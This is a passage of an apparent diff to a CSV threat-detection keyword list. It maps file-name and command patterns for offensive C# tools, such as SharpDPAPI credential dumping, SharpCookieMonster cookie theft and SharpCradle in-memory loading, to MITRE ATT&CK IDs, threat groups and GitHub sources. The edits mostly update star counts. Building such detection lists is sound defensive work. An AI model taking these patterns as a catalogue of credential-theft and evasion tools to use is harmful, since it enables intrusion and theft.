Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*sharpcookiemonster*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*SharpCookieMonster*WebSocket4Net.dll*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*SharpCookieMonster.csproj*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" -"*SharpCookieMonster.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpCookieMonster.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpCookieMonster.exe*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*SharpCookieMonster.sln*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*SharpCookieMonsterOriginal.exe*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*SharpCradle*logonpasswords*","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","275","59","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" "*SharpCradle.exe*","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","275","59","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" -"*SharpCrashEventLog.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpCrashEventLog.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpDcomTrigger.exe*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" -"*SharpDir.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpDllProxy*","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","1","N/A","N/A","6","565","76","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z" +"*SharpDir.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpDllProxy*","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","1","N/A","N/A","6","567","76","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z" "*SharpDomainSpray*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*SharpDomainSpray.*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*SharpDomainSpray-master*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*SharpDoor.exe*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*SharpDoor-master*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" -"*SharpDPAPI backupkey*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI backupkey*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" "*SharpDPAPI*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SharpDPAPI* credentias *","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*SharpDPAPI* vaults *","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*SharpDPAPI.csproj*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*SharpDPAPI.Domain*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*SharpDPAPI.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpDPAPI.exe*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*SharpDPAPI.ps1*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*SharpDPAPI.sln*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*SharpDPAPI.txt*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI* credentias *","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI* vaults *","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI.csproj*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI.Domain*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpDPAPI.exe*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI.ps1*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI.sln*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI.txt*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" "*SharpDPAPIMachine*.cs","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SharpDPAPI-master*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*SharpDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpDPAPI-master*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpDXWebcam*","offensive_tool_keyword","SharpDXWebcam","Utilizing DirectX and DShowNET assemblies to record video from a host's webcam","T1123 - T1059.001 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/snovvcrash/SharpDXWebcam","1","1","N/A","8","1","68","10","2023-07-19T21:09:00Z","2023-07-12T03:26:24Z" -"*sharpedrchecker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*SharpEDRChecker.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharpedrchecker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpEDRChecker.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpEfsPotato by @bugch3ck*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*SharpEfsPotato.cs*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*SharpEfsPotato.exe*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*SharpEfsPotato.sln*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*SharpEfsPotato-master*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*SharpEfsTriggeEfs.exe*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege 